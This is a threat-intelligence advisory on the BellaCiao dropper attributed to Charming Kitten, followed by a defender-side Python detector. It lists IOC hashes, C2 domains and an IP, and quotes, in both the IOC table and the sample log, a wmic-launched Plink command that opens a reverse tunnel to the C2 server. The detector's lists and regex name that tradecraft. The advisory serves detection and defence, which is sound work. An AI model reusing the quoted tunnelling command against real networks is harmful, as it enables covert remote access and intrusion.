Charming Kitten APT Targeting Multiple Global Regions with BellaCiao Custom Dropper Malware Campaign

On April 26, 2023, BitDefender Labs researchers reported the technical details of BellaCiao, a new custom malware they attribute to the Iranian Charming Kitten advanced persistent threat (APT) group.

Context

According to the report, “This malware is tailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach with its command-and-control (C2) infrastructure.” BitDefender reported that samples of BellaCiao they analyzed targeted organizations in the United States, Europe, the Middle East (Turkey), and Asia (India).

Technical Details

According to the report,

  • “The BellaCiao is a dropper malware – it is designed to deliver other malware payloads onto a victim’s computer system, based on instructions from C2 server. The payload delivered by BellaCiao is not downloaded but hardcoded into the executable as malformed base64 strings and dumped when requested.”
  • Each sample analyzed was tailored to a specific target with hardcoded data such as company name, specific subdomains, and public IP addresses.
  • All samples included PDB paths, and those paths contained folders organizing targets by country.
  • The initial infection vector is unknown, but BitDefender researchers assess that a Microsoft Exchange exploit chain or a similar vulnerability was leveraged, since the campaign's primary targets were Microsoft Exchange servers.
  • The malware establishes persistence by creating a new service instance whose name incorporates legitimate Exchange process names as a disguise.

IOCs

BitDefender researchers shared the following indicators of compromise (IOCs):

  • 4812449f7fad62162ba8c4179d5d45d7 (MD5): Plink tool used for establishing reverse proxy connections to the C2 server. The address is provided by the parent PowerShell script.
  • 3fbea74b92f41809f46145f480782ef9 (MD5): The Plink tool used for the same purpose but executed using the wmic[.]exe tool: wmic /node:127[.]0[.]0[.]1 process call create "c:\windows\temp\Certificates\envisa[.]exe 88[.]80[.]148[.]162 -P 443 -C -R 127[.]0[.]0[.]1:40455:192[.]168[.]10[.]10:1433 -l <user> -pw <password>"
  • c450477ed9c347c4c3d7474e1f069f14, c6f394847eb3dc2587dc0c0130249337, 7df50cb7d4620621c2246535dd3ef10c, e7149c402a37719168fb739c62f25585 (MD5): PowerShell script implementing the HTTP server for executing commands. It executes C:\ProgramData\Microsoft\DRMS\JavaUpdateServices[.]exe for communicating with mail-updateservice[.]info.
  • 284cdf5d2b29369f0b35f3ceb363a3d1 (MD5): PowerShell script implementing the HTTP server for executing commands. It executes C:\ProgramData\Microsoft\Diagnostic\MicrosoftExchangeServicesLog[.]exe for communicating with mailupdate[.]com and msn-service[.]co.
  • 2daa29f965f661405e13b2a10d859b87 (MD5): PowerShell script implementing the HTTP server for executing commands. It executes C:\ProgramData\Microsoft\Diagnostic\MicrosoftExchangeDiagnosticServices[.]exe for communicating with maill-support[.]com and msn-center[.]uk.
  • f56a6da833289f821dd63f902a360c31 (MD5): 88[.]80[.]148[.]162
  • mail-updateservice[.]info (Domain)
  • msn-center[.]uk (Domain)
  • msn-service[.]co (Domain)
  • twittsupport[.]com (Domain)
  • mailupdate[.]info (Domain)
  • maill-support[.]com (Domain)
  • 88[.]80[.]148[.]162 (IP Address)
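
As an added defender-side example (not code from the BitDefender report or this page), the following Python flags process-creation log lines that match the tradecraft described above: the wmic-launched Plink reverse tunnel bound to 127.0.0.1, the ProgramData binaries the PowerShell HTTP server launches, and the C2 domains and IP from the IOC table. The "CommandLine:" log format and the sample lines are constructed, and the indicators are refanged only so they match real log text.

```python
import re

# Added detection example, not code from the Bitdefender report: flag process-creation
# command lines matching the BellaCiao tradecraft described on this page.
# Binaries the report says the PowerShell HTTP server launches (defanged on the page).
BELLACIAO_PATHS = (
    r"c:\programdata\microsoft\drms\javaupdateservices.exe",
    r"c:\programdata\microsoft\diagnostic\microsoftexchangeserviceslog.exe",
    r"c:\programdata\microsoft\diagnostic\microsoftexchangediagnosticservices.exe",
)
# C2 domains and IP from the IOC table, refanged so they match real log text.
BELLACIAO_C2 = (
    "mail-updateservice.info", "msn-center.uk", "msn-service.co",
    "twittsupport.com", "mailupdate.info", "maill-support.com", "88.80.148.162",
)
# wmic creating a process on the local node whose arguments carry a plink-style
# reverse tunnel (-R <bind>:<port>:<host>:<port>) bound to 127.0.0.1.
WMIC_LOCAL_REVERSE_TUNNEL = re.compile(
    r"wmic\s+/node:127\.0\.0\.1\s+process\s+call\s+create\b.*"
    r"\s-R\s+127\.0\.0\.1:\d+:\d{1,3}(?:\.\d{1,3}){3}:\d+",
    re.IGNORECASE | re.DOTALL,
)

def classify(cmdline: str) -> list:
    """Return the reasons a command line matches BellaCiao tradecraft ([] if none)."""
    low = cmdline.lower()
    hits = []
    if WMIC_LOCAL_REVERSE_TUNNEL.search(cmdline):
        hits.append("wmic-local-reverse-tunnel")
    if any(path in low for path in BELLACIAO_PATHS):
        hits.append("known-bellaciao-binary-path")
    if any(ioc in low for ioc in BELLACIAO_C2):
        hits.append("known-c2-indicator")
    return hits

def scan(lines):
    """Return [(line_number, hits)] for matching log lines; clean lines are skipped."""
    return [(n, h) for n, line in enumerate(lines, 1) if (h := classify(line))]

# Constructed Sysmon-style process-creation lines (not real telemetry); the first
# mirrors the wmic/Plink command quoted in the IOC table, the last two are benign.
SAMPLE_LOG = [
    'CommandLine: wmic /node:127.0.0.1 process call create "c:\\windows\\temp\\Certificates\\envisa.exe '
    '88.80.148.162 -P 443 -C -R 127.0.0.1:40455:192.168.10.10:1433 -l user -pw secret"',
    "CommandLine: C:\\ProgramData\\Microsoft\\DRMS\\JavaUpdateServices.exe",
    'CommandLine: "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\MSExchangeHMWorker.exe"',
    "CommandLine: wmic /node:127.0.0.1 os get caption",
]
```

Calling scan(SAMPLE_LOG) returns hits for lines 1 and 2 only; the legitimate Exchange worker process and the local wmic query that creates no process do not match.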

 

 
